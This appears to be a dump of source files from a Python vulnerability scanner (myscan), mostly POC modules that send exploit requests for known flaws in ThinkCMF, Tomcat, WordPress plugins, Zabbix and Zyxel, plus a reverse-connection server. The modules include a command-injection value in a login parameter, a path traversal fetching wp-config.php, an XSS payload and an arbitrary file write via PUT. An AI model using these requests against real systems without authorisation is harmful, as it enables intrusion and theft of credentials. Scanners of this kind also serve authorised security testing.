class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "thinkcmf lfi" 18 | self.vulmsg = "links: https://www.freebuf.com/vuls/217586.html" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "?a=display&templateFile=README.md", 28 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 29 | "timeout": 10, 30 | "verify": False, 31 | "allow_redirects": False 32 | 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 200 and b"ThinkCMF" in r.content and b"## README" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": parser_.geturl(), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/thinkphp/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/tomcat/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/tomcat/poc_tomcat_cve-2017-12615_2017.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-17 3 | # @Author : caicai 4 | # @File : poc_iis_6.0_shortname.py 5 | import copy 6 | from myscan.config import scan_set 7 | from myscan.lib.helper.request import request 8 | from myscan.lib.core.common import get_random_str 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "tomcat put rce" 17 | self.vulmsg = '''cve-2017-12615,Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件''' 18 | self.level = 3 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | 25 | url = self.url + get_random_str(6).lower() + ".jsp" 26 | data = get_random_str(20) 27 | req = { 28 | "method": "PUT", 29 | "url": url+"/", 30 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 31 | "data": data, 32 | "timeout": 10, 33 | "verify": False, 34 | } 35 | 36 | r = request(**req) 37 | if r != None and r.status_code == 201: 38 | req2 = { 39 | "method": "GET", 40 | "url": url, 41 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 42 | "timeout": 10, 43 | "verify": False, 44 | } 45 | r2 = request(**req2) 46 | if r2 and data in r2.text: 47 | self.result.append({ 48 | "name": self.name, 49 | "url": self.url, 50 | "level": self.level, # 0:Low 1:Medium 2:High 51 | "detail": { 52 | "vulmsg": self.vulmsg, 53 | } 54 | }) 55 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/tomcat/poc_tomcat_cve-2018-11759_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-17 3 | # @Author : caicai 4 | # @File : poc_tomcat_cve-2018-11759_2018.py 5 | from myscan.config import scan_set 6 | from myscan.lib.helper.request import request 7 | 8 | 9 | 10 | class POC(): 11 | def __init__(self, workdata): 12 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 13 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 14 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 15 | self.name = "apache-mod jk 访问绕过" 16 | self.vulmsg = '''cve-2018-11759,refer:http://blog.nsfocus.net/apache-mod_jk/''' 17 | self.level = 2 # 0:Low 1:Medium 2:High 18 | 19 | def verify(self): 20 | # 根据config.py 配置的深度,限定一下目录深度 21 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 22 | return 23 | 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "jkstatus;", 27 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 28 | "timeout": 10, 29 | "verify": False, 30 | } 31 | 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"JK Status Manager" in r.content and b"Listing Load Balancing Worker" in r.content: 34 | self.result.append({ 35 | "name": self.name, 36 | "url": self.url + "jkstatus;", 37 | "level": self.level, # 0:Low 1:Medium 2:High 38 | "detail": { 39 | "vulmsg": self.vulmsg, 40 | } 41 | }) 42 | 43 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/tongda/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/weblogic/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/wordpress/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/wordpress/poc_wordpress-duplicator-path-traversal.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : poc_wordpress-duplicator-path-traversal.py 5 | 6 | ''' 7 | 未复现 8 | ''' 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "WordPress Wordfence 7.4.6 Cross Site Scripting" 20 | self.vulmsg = "no detail" 21 | self.level = 1 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php", 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and b"DB_NAME" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/wordpress/poc_wordpress_wordfence_xss.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : poc_wordpress_wordfence_xss.py 5 | 6 | ''' 7 | 未复现 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "WordPress Wordfence 7.4.6 Cross Site Scripting" 21 | self.vulmsg = "no detail" 22 | self.level = 1 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E", 31 | "timeout": 10, 32 | "allow_redirects": False, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | if r != None and b"" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/xunchi/poc_xunchi-cnvd-2020-23735-file-read_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/2 3 | # @Author : caicai 4 | # @File : poc_xunchi-cnvd-2020-23735-file-read_2020.py 5 | 6 | 7 | ''' 8 | 未验证 9 | ''' 10 | 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | from myscan.lib.parse.response_parser import response_parser 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "xunchi-cnvd-2020-23735-file-read" 22 | self.vulmsg = "link : https://www.cnvd.org.cn/flaw/show/2025171" 23 | self.level = 2 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | # 根据config.py 配置的深度,限定一下目录深度 27 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 28 | return 29 | 30 | req = { 31 | "url": self.url + "backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php", 32 | "method": "GET", 33 | "headers": { 34 | "Accept-Encoding": "deflate"}, 35 | "verify": False, 36 | "timeout": 10, 37 | } 38 | r = request(**req) 39 | if r is not None and r.status_code == 200 and b"NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" in r.content and b"display_errors" in r.content: 40 | parse = response_parser(r) 41 | self.result.append({ 42 | "name": self.name, 43 | "url": self.url, 44 | "level": self.level, # 0:Low 1:Medium 2:High 45 | "detail": { 46 | "vulmsg": self.vulmsg, 47 | "request": parse.getrequestraw(), 48 | "response": parse.getresponseraw(), 49 | } 50 | }) 51 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zabbix/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zabbix/poc_zabbix_authentication-bypass_2016.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-08 3 | # @Author : caicai 4 | # @File : poc_zabbix_authentication-bypass_2016.py 5 | 6 | from myscan.lib.core.common import getmd5, get_random_num 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "zabbix_authentication-bypass" 18 | self.vulmsg = "未授权访问" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "zabbix.php?action=dashboard.view&dashboardid=1", 28 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 29 | "timeout": 10, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"Dashboard" in r.content and b"title=\"Zabbix Share\"" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": parser_.geturl(), 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zeroshell/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/27 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zyxel/poc_zyxel_cve-2020-9054_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/4 3 | # @Author : caicai 4 | # @File : poc_zyxel_cve-2020-9054_2020.py 5 | 6 | 7 | ''' 8 | 未验证 9 | ''' 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "zyxel_cve-2020-9054_2020" 21 | self.vulmsg = "google it" 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | 29 | req = { 30 | "method": "GET", 31 | "url": self.url + "cgi-bin/weblogin.cgi?username=admin';echo $((1+1787568))", 32 | "timeout": 10, 33 | "verify": False, 34 | "allow_redirects": False 35 | 36 | } 37 | r = request(**req) 38 | if r is not None and b"1787569" in r.content: 39 | parser_ = response_parser(r) 40 | self.result.append({ 41 | "name": self.name, 42 | "url": parser_.geturl(), 43 | "level": self.level, # 0:Low 1:Medium 2:High 44 | "detail": { 45 | "vulmsg": self.vulmsg, 46 | "request": parser_.getrequestraw(), 47 | "response": parser_.getresponseraw() 48 | } 49 | }) 50 | -------------------------------------------------------------------------------- /myscan/pocs/perscheme/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-13 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/pocs/perscheme/__template.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | 7 | #此脚本为编写perscheme的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 8 | 9 | 10 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 11 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 12 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 13 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") #python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | #scheme的poc不同perfoler和perfile,没有workdata没有data字段,所以无self.url 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "your poc name" 22 | self.vulmsg="your poc detail msg" 23 | self.level = 1 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | pass 27 | self.result.append({ 28 | "name": self.name, 29 | "url": "http://example.com/test.php", 30 | "level": self.level, # 0:Low 1:Medium 2:High 31 | "detail": { 32 | "vulmsg": self.vulmsg, 33 | } 34 | }) -------------------------------------------------------------------------------- /myscan/pocs/perscheme/info/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/28 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perscheme/others_webdav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-03-26 3 | # @Author : caicai 4 | # @File : others_webdav.py 5 | 6 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 10 | 11 | ''' 12 | 根据headers包含Translate:、If:、Lock-Token 其中一种便认为为webdav, 13 | ''' 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") #python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | #scheme的poc不同perfoler和perfile,没有workdata没有data字段,所以无self.url 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "发现webdav" 20 | self.vulmsg="探测到开放Webdav,可进行Webdav相关测试" 21 | self.level = 0 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | keys=["translate","if","lock-token"] 25 | parser=dictdata_parser(self.dictdata) 26 | for k,v in self.dictdata.get("request").get("headers").items(): 27 | if k.lower() in keys: 28 | self.result.append({ 29 | "name": self.name, 30 | "url": parser.getfilepath(), 31 | "level": self.level, # 0:Low 1:Medium 2:High 32 | "detail": { 33 | "request":parser.getrequestraw(), 34 | "response":parser.getresponseraw(), 35 | "vulmsg": self.vulmsg, 36 | } 37 | }) 38 | break -------------------------------------------------------------------------------- /myscan/pocs/perscheme/poc_apereo_cas_rce_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/12/25 3 | # @Author : caicai 4 | # @File : poc_apereo_cas_rce_2019.py 5 | 6 | ''' 7 | 被动触发 8 | ''' 9 | 10 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 11 | from myscan.pocs.perfolder.apereo.poc_apereo_cas_rce_2019 import POC as mypoc 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.workdata = workdata 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | # scheme的poc不同perfoler和perfile,没有workdata没有data字段,所以无self.url 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "apereo_cas_rce" 21 | self.vulmsg = "detail: https://github.com/vulhub/vulhub/blob/master/apereo-cas/4.1-rce/README.zh-cn.md" 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 添加限定条件 26 | if self.dictdata.get("request").get("method").lower() != "post": 27 | return 28 | self.parser = dictdata_parser(self.dictdata) 29 | if b"<=LT-" in self.parser.getrequestbody(): 30 | poc = mypoc(self.workdata) 31 | poc.verify() 32 | self.result = poc.result 33 | -------------------------------------------------------------------------------- /myscan/pocs/perscheme/shiro/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/12/14 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perserver/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/pocs/perserver/__template.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-07-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | 7 | # 此脚本为编写perserver的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 8 | 9 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 10 | from myscan.lib.hostscan.pocbase import PocBase 11 | from myscan.lib.core.data import paths, cmd_line_options 12 | from myscan.lib.hostscan.common import get_data_from_file 13 | from myscan.lib.core.threads import mythread 14 | import os, socket 15 | 16 | 17 | class POC(PocBase): 18 | def __init__(self, workdata): 19 | self.dictdata = workdata.get("dictdata") # python的dict数据,详见 Class3-hostscan开发指南.md 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.addr = self.dictdata.get("addr") # type:str 22 | self.port = self.dictdata.get("port") # type:int 23 | # 以下根据实际情况填写 24 | self.name = "your poc name " 25 | self.vulmsg = "your poc vulmsg" 26 | self.level = 0 # 0:Low 1:Medium 2:High 27 | self.require = { 28 | "service": ["redis"], 29 | "type": "tcp" 30 | } 31 | # 自定义参数 32 | 33 | def verify(self): 34 | if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 35 | return 36 | 37 | self.result.append({ 38 | "name": self.name, 39 | "url": "tcp://{}:{}".format(self.addr, self.port), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perserver/mongodb_unauth.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/27 3 | # @Author : caicai 4 | # @File : mongodb_unauth.py 5 | 6 | 7 | from myscan.lib.hostscan.pocbase import PocBase 8 | import pymongo 9 | 10 | 11 | class POC(PocBase): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详见 Class3-hostscan开发指南.md 14 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 15 | self.addr = self.dictdata.get("addr") # type:str 16 | self.port = self.dictdata.get("port") # type:int 17 | # 以下根据实际情况填写 18 | self.name = "mongodb_unauth" 19 | self.vulmsg = "unatuh access" 20 | self.level = 2 # 0:Low 1:Medium 2:High 21 | self.require = { 22 | "service": ["mongodb"], # nmap本身识别microsoft-ds ,为了以后扩展自己识别脚本,多个smb 23 | "type": "tcp" 24 | } 25 | 26 | def verify(self): 27 | if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 28 | return 29 | try: 30 | conn = pymongo.MongoClient(self.addr, self.port, socketTimeoutMS=3000) 31 | dbname = conn.list_database_names() 32 | if dbname: 33 | self.result.append({ 34 | "name": self.name, 35 | "url": "tcp://{}:{}".format(self.addr, self.port), 36 | "level": self.level, # 0:Low 1:Medium 2:High 37 | "detail": { 38 | "vulmsg": self.vulmsg, 39 | "dbname": str(dbname) 40 | } 41 | }) 42 | except Exception as e: 43 | pass 44 | -------------------------------------------------------------------------------- /myscan/pocs/perserver/rmi_deserialization.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/15 3 | # @Author : caicai 4 | # @File : rmi_deserialization.py 5 | 6 | 7 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 8 | from myscan.lib.hostscan.pocbase import PocBase 9 | from myscan.lib.core.data import paths, cmd_line_options 10 | from myscan.lib.hostscan.common import get_data_from_file 11 | from myscan.lib.core.threads import mythread 12 | import os, socket 13 | 14 | 15 | class POC(PocBase): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详见 Class3-hostscan开发指南.md 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.addr = self.dictdata.get("addr") # type:str 20 | self.port = self.dictdata.get("port") # type:int 21 | # 以下根据实际情况填写 22 | self.name = "rmi_deserialization" 23 | self.vulmsg = "enum gadget" 24 | self.level = 0 # 0:Low 1:Medium 2:High 25 | self.require = { 26 | "service": ["rmi"], 27 | "type": "tcp" 28 | } 29 | # 自定义参数 30 | 31 | def verify(self): 32 | if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 33 | return 34 | # 还未开发 35 | return 36 | self.result.append({ 37 | "name": self.name, 38 | "url": "tcp://{}:{}".format(self.addr, self.port), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | } 43 | }) 44 | -------------------------------------------------------------------------------- /myscan/pocs/perserver/smb_info.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/14 3 | # @Author : caicai 4 | # @File : smb_info.py 5 | 6 | 7 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 8 | from myscan.lib.hostscan.pocbase import PocBase 9 | from myscan.lib.core.data import paths, cmd_line_options 10 | from myscan.lib.hostscan.common import get_data_from_file 11 | from myscan.lib.core.threads import mythread 12 | import os, socket 13 | 14 | 15 | class POC(PocBase): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详见 Class3-hostscan开发指南.md 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.addr = self.dictdata.get("addr") # type:str 20 | self.port = self.dictdata.get("port") # type:int 21 | # 以下根据实际情况填写 22 | self.name = "smb_info" 23 | self.vulmsg = "smb_info leak." 24 | self.level = 0 # 0:Low 1:Medium 2:High 25 | self.require = { 26 | "service": ["smb", "samba", "microsoft-ds"], 27 | "type": "tcp" 28 | } 29 | # 自定义参数 30 | 31 | def verify(self): 32 | if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 33 | return 34 | return 35 | # 还未开发 36 | # 37 | # self.result.append({ 38 | # "name": self.name, 39 | # "url": "tcp://{}:{}".format(self.addr, self.port), 40 | # "level": self.level, # 0:Low 1:Medium 2:High 41 | # "detail": { 42 | # "vulmsg": self.vulmsg, 43 | # } 44 | # }) 45 | -------------------------------------------------------------------------------- /myscan/reverse/reverse.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-23 3 | # @Author : caicai 4 | # @File : reverse.py 5 | import sys 6 | 7 | from myscan.lib.core.data import logger, cmd_line_options 8 | from myscan.config import reverse_set 9 | from myscan.lib.core.common import get_random_str 10 | from myscan.reverse.reverse_http import http_start 11 | from myscan.reverse.reverse_dns import dns_start 12 | from myscan.reverse.reverse_rmi import rmi_start 13 | from myscan.reverse.reverse_ldap import ldap_start 14 | from myscan.lib.core.common_reverse import init_db 15 | from multiprocessing import Process 16 | 17 | 18 | def reverse_start(): 19 | try: 20 | secret_key = reverse_set.get("secret_key") 21 | if not secret_key: 22 | secret_key = get_random_str(9) 23 | logger.info("Reverse http server: http://{}:{} secret_key: {}".format(reverse_set.get("reverse_http_ip"), 24 | reverse_set.get("reverse_http_port"), 25 | secret_key)) 26 | logger.info("Reverse dns server: {}".format(reverse_set.get("reverse_domain"))) 27 | logger.info("Reverse rmi server: {}:{}".format(reverse_set.get("reverse_rmi_ip"),reverse_set.get("reverse_rmi_port"))) 28 | logger.info("Reverse ldap server: {}:{}".format(reverse_set.get("reverse_ldap_ip"),reverse_set.get("reverse_ldap_port"))) 29 | 30 | init_db() 31 | try: 32 | p = Process(target=http_start,args=(secret_key,)) 33 | p.daemon = True 34 | p.start() 35 | p1 = Process(target=rmi_start) 36 | p1.daemon = True 37 | p1.start() 38 | p2 = Process(target=ldap_start) 39 | p2.daemon = True 40 | p2.start() 41 | dns_start() 42 | except KeyboardInterrupt as ex: 43 | logger.warning("Ctrl+C was pressed ,aborted program") 44 | except Exception as ex: 45 | logger.warning("Start reverse get error:{}".format(ex)) 46 | sys.exit() 47 | -------------------------------------------------------------------------------- /myscan/tests/TODO: -------------------------------------------------------------------------------- 1 | 2.布尔盲注去除图片后缀 OK 2 | 3.支持--clean单独参数 3 | 4.继承类 ok 4 | 5.burp jar 输出url ok 5 | 6.iis 短文件名优化 6 | 7.反连平台支持ldap ok 7 | 8.burp jar 